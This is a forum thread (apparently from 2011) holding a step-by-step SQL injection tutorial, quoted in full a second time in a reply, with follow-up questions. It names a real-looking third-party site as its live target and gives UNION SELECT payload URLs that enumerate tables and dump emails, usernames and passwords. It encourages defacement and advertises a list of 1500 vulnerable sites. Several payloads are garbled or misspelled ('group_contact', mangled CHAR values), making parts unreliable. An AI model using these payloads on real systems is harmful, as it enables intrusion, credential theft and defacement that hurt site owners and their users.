Post: SQL Injection - The Real Tutorial
05-08-2011, 09:46 AM #1
(adsbygoogle = window.adsbygoogle || []).push({});
SQL Injection



Today I will be showing you guys how to get Database information of a website with the very known exploiting method: SQLi.

I am making this tutorial in the Computing and Hacking section and not in the premium section as the tutorial should be accessed by all members and not only for premiums as this tutorial is every where on the internet Smile


So lets get started :y:

What is SQL Injection?
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
Source: You must login or register to view this content.

SQL Injection is a very well known exploiting method. You can only SQL Inject a website if it's vulnerable to SQLi.


What can I gain from SQL Injecting a website?
You basically get ALL the database information of the website. The database includes information about ALL users (Password, Name, Email, Join date even Credit Card info ect.)
You can also gain Admin login. After you have that, you can finally deface the site Smile


[multipage=Getting Started/Finding a Target]

▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - Finding a Target █ ▇ ▆ ▅ ▄ ▃ ▂



So now you know what SQL injection is, now we can finally get in action :evil:

First of all we need to find a target. The target HAS to be vulnerable to SQLi. To find out if a website is vulnerable to SQLi, simply add a ' at the end of the url.
So for me it would be: www.examplewebsite.com/index.php?id=1'
Now press enter, if you get an error that says something like: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar. That error is good, as it means that the site is vulnerable, hackable, so now you can simply continue with SQL Injecting Happy. If you get no error, the site is not vulnerable.

Here is a nice tutorial by my friend Curt on how to find a vulnerable website Smile Thanks to him :y:

You must login or register to view this content.

[multipage=The 1st Tutorial]

▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Method 1 █ ▇ ▆ ▅ ▄ ▃ ▂



So now here is the tutorial. Enjoy and follow all the steps to be successful Smile

So now you have your target and you know it is vulnerable to SQLi. Now all we have to do is inject our codes to get the database information Happy

So my target today will be:
    https://www.novebrno.net/article.php?id=616


I tested it and it is vulnerable.

Now we are going to add +ORDER+BY+1-- to the site. Now most people that know SQL will ask why not add order by 1--? Mainly because you can change the URL if you add the + to order by 1--, you will find it out yourself :p
So the site should look like this now:
    https://www.novebrno.net/article.php?id=-616+ORDER+BY+1--


Now you will be :wtf: I didn't get an error. Well now simply change the 1 at the end of the url to 2, now just keep going until you get an error.
I tested it and I got an error at column 12:
You must login or register to view this content.

So now I got an error at column 12, so there are 11 columns that are available and column 12 doesn't exist.

So now lets keep going.

So now we now the 11 available columns, we gotta find the vulnerable column. Just add:
    +UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--
at the end of the url

NOTE: I have UNION SELECT 1,2,3,4,5,6,7,8,9,10,11-- because I have 11 available columns, yours might be different.

Now there should be a number on the screen, it can either only be one of the 11 available columns (in my case).
But in my case, there are no numbers showing. Why? Because some websites require you to null the value you are injecting into.

So all we do now is add a - before the number. It should look like this:
    https://www.novebrno.net/article.php?id=-616+union+select+1,2,3,4,5,6,7,8,9,10,11--


Now I am getting an error and the number is showing:
You must login or register to view this content.

Number 5 is showing on my screen, so now we will keep going with this number.

So now we have to replace the number 5 with @@version
Add this at the end of the url: +UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11--

NOTE: In my case number 5 is showing, if you have number 3 on the screen it should look like this +UNION+SELECT+1,2,@@version--

The URL should look like this:
    https://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11--


So now you will see a number on the screen, it is the Database version. If the Database is 5 and above, you are fine and it will be easy to get the information and tables Smile

IF the database is 4 and lower, it will be hard to get tables, more to read later.

▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 5 and above █ ▇ ▆ ▅ ▄ ▃ ▂


Screenie of my database:

You must login or register to view this content.

So now we know the database version, now we need to get the tables names.
To do so, add this at the end of the url: +UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables

NOTE: It should be different in your case, in my case it's 1,2,3,4,table_name,... ect.

The url should look like this now:
    https://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables


Now you should get the Tables information.

Sometimes, some of the table names will be cut off, because we are calling the tables from information_schema. So here, we would want to pull the data from the primary database, instead of information_schema.

If it's that case add this at the end of the url: +UNION+SELECT+1,2,3,4,group_contact(table_name),6,7,8,9,10,11 from information_schema.tables+where+table_schema=database()

Now this should work and you should get all the tables information Smile

Some Tables should be:
    About, Admin, Admins, User, Users, Affiliates, Access, Customer, User, Login, terms, posts, etc


Now we want to get the data from those tables. Well, we will change the data in the vulnerable column from table_name, to column_name

So we add this at the end of the url:r
+UNION+SELECT+1,2,3,4,group_contact(column_name),6,7,8,9,10,11 from information_schema.columns+where+table_name=*Hexed table name*

So it should look like this:
    https://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,group_contact(column_name),6,7,8,9,10,11 from information_schema.columns+where+table_name=*Hexed table name*ed%20table%20name*


So now lets say we got a 'admin' table, now we will change the url to:
    https://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(column_name),3%20from%20information_schema.columns+where+table_name=admin


You can change the table_name=.. to any table you want to get information from.

Now you will be like wtf? It didn't work, well that is because we didn't hax the table name. So now to hax the table name go to: You must login or register to view this content. to convert the name admin into hax datas.

Now change the url to:
    https://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(column_name),3%20from%20information_schema.columns+where+table_name=0x61646d696e


Admin is 61646d696e in hex, so I changed that at the end of the url. NOTE: you have to add 0x before the numbers.

Now that will give us all the columns of the table admin. :y:

Now lets say we got the columns email,password and username, to get the information of them type in the following in the url bar: +UNION+SELECT+1,group_contact(email,0x3a,username,0x3a,password),3 from admin

So it should look like:
    https://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(email,0x3a,username,0x3a,password),3 from admin


So now you finally have the passwords, emails and user names Smile

Remember, if your tables are different you also have to change the data with that I provided you. Always think while hacking, don't just be script kidde Awesome face


▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 4 and above █ ▇ ▆ ▅ ▄ ▃ ▂



Now as pointed before, if you're database is 4 and lower, you have a lil problem and it will be harder to get the tables.

If your database is 4 or lower add the following at the end of the url: +UNION+SELECT+1,concat(table_name,CHAR(5Cool Man (aka Tustin),column_name,CHAR(5Cool Man (aka Tustin),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3--

NOTE: If you have 5 available columns you will have to change it ect...

Now if you get no error and you see the tables you are fine Smile If not you are fuked and you will probably have to guess the tables :(

Here are some known table names:
    tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins, 


Now just add the following at the end of the url: +UNION+SELECT+1,2,3 from TABLE NAME HERE

So now I will guess the table name admins on my test url:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,2,3 from admin


Now just keep guessing until you find a table name that works Winky Winky

Now lets say the following table worked:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,2,3 from users


Now we will have to guess the columns Winky Winky Yes this is a fuking pain in the ass I know :(

Common columns names are:
    first_name, last_name, email, username, password, pass, user_id, user_pass


Now we will test the table name, user_pass type in the following at the end of the url: +UNION+SELECT+1,user_pass,3 from users

So it should look like this:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,user_pass,3 from users


Now just keep guessing until one of the columns works. Happy

Now for example to get the user name, password and email type in the following at the end of the url: +UNION+SELECT+1,contact(email,0x3a,username,0x3a,password),3 from users

So this will give us the information of the admin Smile

So this was the tutorial Hope you enjoyed Smile

[multipage=The 2nd Tutorial]

▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Method 2 █ ▇ ▆ ▅ ▄ ▃ ▂



So now since there are different ways to SQLi, I will post up 2 methods for you guys :rolleyes:

So this time I will be using a test site, as I don't have time to look for the right vulnerable site :p
My site will be called:
    www.sqlitestsite.com/index.php/id=234


So now we have a target, now we gotta find the available columns. To find them add: order by 1/* at the end of the url, so it should look like:
    www.sqlitestsite.com/index.php/id=234 order by 1/*

NOTE: You can also use -- instead of /*.

Now this of course didn't give us an error, so we have to keep trying, just go on with:
order by 2/*
NO ERROR
order by 3/*
NO ERROR
order by 4/*
ERROR

So now we got an error at columns 4, that means there are 3 available columns, as column 4 doesn't exist and gave us the error.

Now we need to find which column is the one that is vulnerable, to do that add: union all select 1,2,3/* at the end of the url. So it should look like this:
    www.sqlitestsite.com/index.php/id=234 union all select 1,2,3/*


Now if there are no numbers showing on the screen, add a - before the =. So it should look like:
    www.sqlitestsite.com/index.php/id=-234 union all select 1,2,3/*


Now there is number 2 showing on the screen, so I know, columns 2 is vulnerable and I will be using this one to find out the database information Happy

So now to find out the database version, we need to replace the vulnerable column with @@database. So add: union all select 1,@@database,3/* at the end of the url. It should look like this:
    www.sqlitestsite.com/index.php/id=234 union all select 1,@@database,3/*


Now there you should see the database version at the screen. It will either be something like 4.xxx and 5.xxx.

So now since there are different methods for the databases I will split now the tutorial.


▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 5 and above █ ▇ ▆ ▅ ▄ ▃ ▂



So now we know that the database is version 5 and above. Now we need to find the tables Gaspink:

We need to replace the vulnerable column with table_name and add information_tables at the end of the url.
To get the tables add the following at the end of the url: union all select 1,table_name,3 from information_schema.tables/*
So it should look like:

    www.sqlitestsite.com/index.php/id=234  union all select 1,table_name,3 from information_schema.tables/*


Now you will see a few tables on the screen, but that are not all of them, to find all tables we need to limit the end of the query. We will do that by adding 0,1.. and so on at the end of the url.

Just add the following at the end of the url: union all select 1,table_name,3 from information_schema.tables limit 0,1/*

Now we know table one, but that's not enough, we need to get the right table to find out all the user information and also admin login.

Now to get the 2nd table, we need to replace 0,1, with 1,1 so it should look like: union all select 1,table_name,3 from information_schema.tables limit 1,1/*

To get the 3rd table we need to replace 1,1 with 2,1, so now you will just have to keep going until you find a useful table that can get us the information Smile

In order good tables are:
    tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins, 


Now we know the tables, now we need to find out the columns.

To find out the columns we will replace the vulnerable columns with: column_name so just add the following at the end of the url: union all select 1,column_name,3 from information_schema.columns limit 0,1/*

    www.sqlitestsite.com/index.php/id=234 union all select 1,column_name,3 from information_schema.columns limit 0,1/*


So now just replace 0,1 with 1,1, than with 2,1 and so on until you find a useful column as the following:
    first_name, last_name, email, username, password, pass, user_id, user_pass


So now we found a good table, lets say we found table admin. To get more info of that table add the following at the end of the url: union all select 1,column_name,3 from information_schema.columns where table_name='admin'/*

    www.sqlitestsite.com/index.php/id=234 union all select 1,column_name,3 from information_schema.columns where table_name='admin'/


So now we will get more information about the table "admin"

So now we see all the columns in table admin. To get the info of the columns you will have to type in the following, let's say we got column id, password, username: union all select 1,concat(id,0x3a,password,0x3a,username) from users/*

The 0x3a is the hex for a ;.

Now we will get the information and we are finally done with hacking a database version 5 Smile
[multipage=Conclusion and some Goodies Awesome face]


▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 4 and above █ ▇ ▆ ▅ ▄ ▃ ▂


As Pointed before, I will show you guys now how to get the database info if the version is 4 or below.

adding soon, gotta do P90x now =D Awesome face
▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - Conclusion + Goodies █ ▇ ▆ ▅ ▄ ▃ ▂


So guys this was my tutorial on how to SQL Inject websites Smile I hope you understood everything, but if not feel free to ask me via private message, post your question below or add me on msn: [email][email protected][/email]

Guys it took me 4 hours to make this fuking thread, so I would appreciate it if you say Thank you Winky Winky


Now since I am a nice guy, I will provide you guys with some goodies Smile

List of over 1500 vulnerable sites (found by me):
DOWNLOAD LINK: You must login or register to view this content.


Too lazy to do the manual SQL Injection? Here is a tutorial on how to SQLi with Havij and SQLi Helper v2.7 (Must be premium): You must login or register to view this content.


Want to make a good defacement but you don't know html or php? Use this tool to do the work for you Smile (Must be premium):
You must login or register to view this content.
Last edited by xTrYiPiCz ; 06-12-2011 at 11:19 AM.

The following 9 users say thank you to xTrYiPiCz for this useful post:

ClutchLikeObama, Curt, Goleggett, HonuCinema, IKvPro, Legalize It, thenewbigmack, Wondoh
06-22-2011, 01:28 AM #11
Default Avatar
gorgorn
Guest
wow.. great tutorial..:y::y:

i have one question..

how to make sql injection if the link of a website, there is no have integer number?

i mean like this :
    https://www.examplewebsite.com/index.php?id=ADMIN


so, the is imposible to making SQL injection of these website..??YesYes

sorry for my bad english...:confused::confused:
06-22-2011, 01:32 AM #12
ᴬustin_Powers
Do I make you horny?
Originally posted by gorgorn View Post
wow.. great tutorial..:y::y:

i have one question..

how to make sql injection if the link of a website, there is no have integer number?

i mean like this :
    https://www.examplewebsite.com/index.php?id=ADMIN


so, the is imposible to making SQL injection of these website..??YesYes

sorry for my bad english...:confused::confused:


You need to find the integer number, if there isn't one, you have to use a different method of hacking the site.
06-22-2011, 01:43 AM #13
Default Avatar
gorgorn
Guest
Originally posted by Powers View Post
You need to find the integer number, if there isn't one, you have to use a different method of hacking the site.


what is the different method?

can u tell me more about these..??
06-25-2011, 09:05 PM #14
Nice Post But I Already Know All This Stuff. :y:
06-26-2011, 05:45 PM #15
2RAW4THESTREET
The Best who ever lived
Great tutorial bro. Well done.
08-13-2011, 09:18 AM #16
Default Avatar
porsch3
Guest
nice tutorial
08-20-2011, 07:44 PM #17
almyz125
Save Point
Thanks for the tut.
08-20-2011, 07:56 PM #18
Ameht!
Dark Knight
Originally posted by xTrYiPiCz View Post
SQL Injection



Today I will be showing you guys how to get Database information of a website with the very known exploiting method: SQLi.

I am making this tutorial in the Computing and Hacking section and not in the premium section as the tutorial should be accessed by all members and not only for premiums as this tutorial is every where on the internet Smile


So lets get started :y:

What is SQL Injection?
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
Source: You must login or register to view this content.

SQL Injection is a very well known exploiting method. You can only SQL Inject a website if it's vulnerable to SQLi.


What can I gain from SQL Injecting a website?
You basically get ALL the database information of the website. The database includes information about ALL users (Password, Name, Email, Join date even Credit Card info ect.)
You can also gain Admin login. After you have that, you can finally deface the site Smile


[multipage=Getting Started/Finding a Target]

▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - Finding a Target █ ▇ ▆ ▅ ▄ ▃ ▂



So now you know what SQL injection is, now we can finally get in action :evil:

First of all we need to find a target. The target HAS to be vulnerable to SQLi. To find out if a website is vulnerable to SQLi, simply add a ' at the end of the url.
So for me it would be: www.examplewebsite.com/index.php?id=1'
Now press enter, if you get an error that says something like: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar. That error is good, as it means that the site is vulnerable, hackable, so now you can simply continue with SQL Injecting Happy. If you get no error, the site is not vulnerable.

Here is a nice tutorial by my friend Curt on how to find a vulnerable website Smile Thanks to him :y:

You must login or register to view this content.

[multipage=The 1st Tutorial]

▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Method 1 █ ▇ ▆ ▅ ▄ ▃ ▂



So now here is the tutorial. Enjoy and follow all the steps to be successful Smile

So now you have your target and you know it is vulnerable to SQLi. Now all we have to do is inject our codes to get the database information Happy

So my target today will be:
    https://www.novebrno.net/article.php?id=616


I tested it and it is vulnerable.

Now we are going to add +ORDER+BY+1-- to the site. Now most people that know SQL will ask why not add order by 1--? Mainly because you can change the URL if you add the + to order by 1--, you will find it out yourself :p
So the site should look like this now:
    https://www.novebrno.net/article.php?id=-616+ORDER+BY+1--


Now you will be :wtf: I didn't get an error. Well now simply change the 1 at the end of the url to 2, now just keep going until you get an error.
I tested it and I got an error at column 12:
You must login or register to view this content.

So now I got an error at column 12, so there are 11 columns that are available and column 12 doesn't exist.

So now lets keep going.

So now we now the 11 available columns, we gotta find the vulnerable column. Just add:
    +UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--
at the end of the url

NOTE: I have UNION SELECT 1,2,3,4,5,6,7,8,9,10,11-- because I have 11 available columns, yours might be different.

Now there should be a number on the screen, it can either only be one of the 11 available columns (in my case).
But in my case, there are no numbers showing. Why? Because some websites require you to null the value you are injecting into.

So all we do now is add a - before the number. It should look like this:
    https://www.novebrno.net/article.php?id=-616+union+select+1,2,3,4,5,6,7,8,9,10,11--


Now I am getting an error and the number is showing:
You must login or register to view this content.

Number 5 is showing on my screen, so now we will keep going with this number.

So now we have to replace the number 5 with @@version
Add this at the end of the url: +UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11--

NOTE: In my case number 5 is showing, if you have number 3 on the screen it should look like this +UNION+SELECT+1,2,@@version--

The URL should look like this:
    https://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11--


So now you will see a number on the screen, it is the Database version. If the Database is 5 and above, you are fine and it will be easy to get the information and tables Smile

IF the database is 4 and lower, it will be hard to get tables, more to read later.

▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 5 and above █ ▇ ▆ ▅ ▄ ▃ ▂


Screenie of my database:

You must login or register to view this content.

So now we know the database version, now we need to get the tables names.
To do so, add this at the end of the url: +UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables

NOTE: It should be different in your case, in my case it's 1,2,3,4,table_name,... ect.

The url should look like this now:
    https://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables


Now you should get the Tables information.

Sometimes, some of the table names will be cut off, because we are calling the tables from information_schema. So here, we would want to pull the data from the primary database, instead of information_schema.

If it's that case add this at the end of the url: +UNION+SELECT+1,2,3,4,group_contact(table_name),6,7,8,9,10,11 from information_schema.tables+where+table_schema=database()

Now this should work and you should get all the tables information Smile

Some Tables should be:
    About, Admin, Admins, User, Users, Affiliates, Access, Customer, User, Login, terms, posts, etc


Now we want to get the data from those tables. Well, we will change the data in the vulnerable column from table_name, to column_name

So we add this at the end of the url:r
+UNION+SELECT+1,2,3,4,group_contact(column_name),6,7,8,9,10,11 from information_schema.columns+where+table_name=*Hexed table name*

So it should look like this:
    https://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,group_contact(column_name),6,7,8,9,10,11 from information_schema.columns+where+table_name=*Hexed table name*ed%20table%20name*


So now lets say we got a 'admin' table, now we will change the url to:
    https://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(column_name),3%20from%20information_schema.columns+where+table_name=admin


You can change the table_name=.. to any table you want to get information from.

Now you will be like wtf? It didn't work, well that is because we didn't hax the table name. So now to hax the table name go to: You must login or register to view this content. to convert the name admin into hax datas.

Now change the url to:
    https://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(column_name),3%20from%20information_schema.columns+where+table_name=0x61646d696e


Admin is 61646d696e in hex, so I changed that at the end of the url. NOTE: you have to add 0x before the numbers.

Now that will give us all the columns of the table admin. :y:

Now lets say we got the columns email,password and username, to get the information of them type in the following in the url bar: +UNION+SELECT+1,group_contact(email,0x3a,username,0x3a,password),3 from admin

So it should look like:
    https://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(email,0x3a,username,0x3a,password),3 from admin


So now you finally have the passwords, emails and user names Smile

Remember, if your tables are different you also have to change the data with that I provided you. Always think while hacking, don't just be script kidde Awesome face


▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 4 and above █ ▇ ▆ ▅ ▄ ▃ ▂



Now as pointed before, if you're database is 4 and lower, you have a lil problem and it will be harder to get the tables.

If your database is 4 or lower add the following at the end of the url: +UNION+SELECT+1,concat(table_name,CHAR(5Cool Man (aka Tustin),column_name,CHAR(5Cool Man (aka Tustin),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3--

NOTE: If you have 5 available columns you will have to change it ect...

Now if you get no error and you see the tables you are fine Smile If not you are fuked and you will probably have to guess the tables :(

Here are some known table names:
    tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins, 


Now just add the following at the end of the url: +UNION+SELECT+1,2,3 from TABLE NAME HERE

So now I will guess the table name admins on my test url:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,2,3 from admin


Now just keep guessing until you find a table name that works Winky Winky

Now lets say the following table worked:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,2,3 from users


Now we will have to guess the columns Winky Winky Yes this is a fuking pain in the ass I know :(

Common columns names are:
    first_name, last_name, email, username, password, pass, user_id, user_pass


Now we will test the table name, user_pass type in the following at the end of the url: +UNION+SELECT+1,user_pass,3 from users

So it should look like this:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,user_pass,3 from users


Now just keep guessing until one of the columns works. Happy

Now for example to get the user name, password and email type in the following at the end of the url: +UNION+SELECT+1,contact(email,0x3a,username,0x3a,password),3 from users

So this will give us the information of the admin Smile

So this was the tutorial Hope you enjoyed Smile

[multipage=The 2nd Tutorial]

▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Method 2 █ ▇ ▆ ▅ ▄ ▃ ▂



So now since there are different ways to SQLi, I will post up 2 methods for you guys :rolleyes:

So this time I will be using a test site, as I don't have time to look for the right vulnerable site :p
My site will be called:
    www.sqlitestsite.com/index.php/id=234


So now we have a target, now we gotta find the available columns. To find them add: order by 1/* at the end of the url, so it should look like:
    www.sqlitestsite.com/index.php/id=234 order by 1/*

NOTE: You can also use -- instead of /*.

Now this of course didn't give us an error, so we have to keep trying, just go on with:
order by 2/*
NO ERROR
order by 3/*
NO ERROR
order by 4/*
ERROR

So now we got an error at columns 4, that means there are 3 available columns, as column 4 doesn't exist and gave us the error.

Now we need to find which column is the one that is vulnerable, to do that add: union all select 1,2,3/* at the end of the url. So it should look like this:
    www.sqlitestsite.com/index.php/id=234 union all select 1,2,3/*


Now if there are no numbers showing on the screen, add a - before the =. So it should look like:
    www.sqlitestsite.com/index.php/id=-234 union all select 1,2,3/*


Now there is number 2 showing on the screen, so I know, columns 2 is vulnerable and I will be using this one to find out the database information Happy

So now to find out the database version, we need to replace the vulnerable column with @@database. So add: union all select 1,@@database,3/* at the end of the url. It should look like this:
    www.sqlitestsite.com/index.php/id=234 union all select 1,@@database,3/*


Now there you should see the database version at the screen. It will either be something like 4.xxx and 5.xxx.

So now since there are different methods for the databases I will split now the tutorial.


▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 5 and above █ ▇ ▆ ▅ ▄ ▃ ▂



So now we know that the database is version 5 and above. Now we need to find the tables Gaspink:

We need to replace the vulnerable column with table_name and add information_tables at the end of the url.
To get the tables add the following at the end of the url: union all select 1,table_name,3 from information_schema.tables/*
So it should look like:

    www.sqlitestsite.com/index.php/id=234  union all select 1,table_name,3 from information_schema.tables/*


Now you will see a few tables on the screen, but that are not all of them, to find all tables we need to limit the end of the query. We will do that by adding 0,1.. and so on at the end of the url.

Just add the following at the end of the url: union all select 1,table_name,3 from information_schema.tables limit 0,1/*

Now we know table one, but that's not enough, we need to get the right table to find out all the user information and also admin login.

Now to get the 2nd table, we need to replace 0,1, with 1,1 so it should look like: union all select 1,table_name,3 from information_schema.tables limit 1,1/*

To get the 3rd table we need to replace 1,1 with 2,1, so now you will just have to keep going until you find a useful table that can get us the information Smile

In order good tables are:
    tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins, 


Now we know the tables, now we need to find out the columns.

To find out the columns we will replace the vulnerable columns with: column_name so just add the following at the end of the url: union all select 1,column_name,3 from information_schema.columns limit 0,1/*

    www.sqlitestsite.com/index.php/id=234 union all select 1,column_name,3 from information_schema.columns limit 0,1/*


So now just replace 0,1 with 1,1, than with 2,1 and so on until you find a useful column as the following:
    first_name, last_name, email, username, password, pass, user_id, user_pass


So now we found a good table, lets say we found table admin. To get more info of that table add the following at the end of the url: union all select 1,column_name,3 from information_schema.columns where table_name='admin'/*

    www.sqlitestsite.com/index.php/id=234 union all select 1,column_name,3 from information_schema.columns where table_name='admin'/


So now we will get more information about the table "admin"

So now we see all the columns in table admin. To get the info of the columns you will have to type in the following, let's say we got column id, password, username: union all select 1,concat(id,0x3a,password,0x3a,username) from users/*

The 0x3a is the hex for a ;.

Now we will get the information and we are finally done with hacking a database version 5 Smile
[multipage=Conclusion and some Goodies Awesome face]


▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 4 and above █ ▇ ▆ ▅ ▄ ▃ ▂


As Pointed before, I will show you guys now how to get the database info if the version is 4 or below.

adding soon, gotta do P90x now =D Awesome face
▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - Conclusion + Goodies █ ▇ ▆ ▅ ▄ ▃ ▂


So guys this was my tutorial on how to SQL Inject websites Smile I hope you understood everything, but if not feel free to ask me via private message, post your question below or add me on msn: [email][email protected][/email]

Guys it took me 4 hours to make this fuking thread, so I would appreciate it if you say Thank you Winky Winky


Now since I am a nice guy, I will provide you guys with some goodies Smile

List of over 1500 vulnerable sites (found by me):
DOWNLOAD LINK: You must login or register to view this content.


Too lazy to do the manual SQL Injection? Here is a tutorial on how to SQLi with Havij and SQLi Helper v2.7 (Must be premium): You must login or register to view this content.


Want to make a good defacement but you don't know html or php? Use this tool to do the work for you Smile (Must be premium):
You must login or register to view this content.





your the man Winky Winky
09-22-2011, 12:35 PM #19
I found an error on a site on line 231.

Do I really need to put [url]www.sitename.com/...+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11[/url].... all the way up to 231?!

There must be an easier way.

Thanks

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo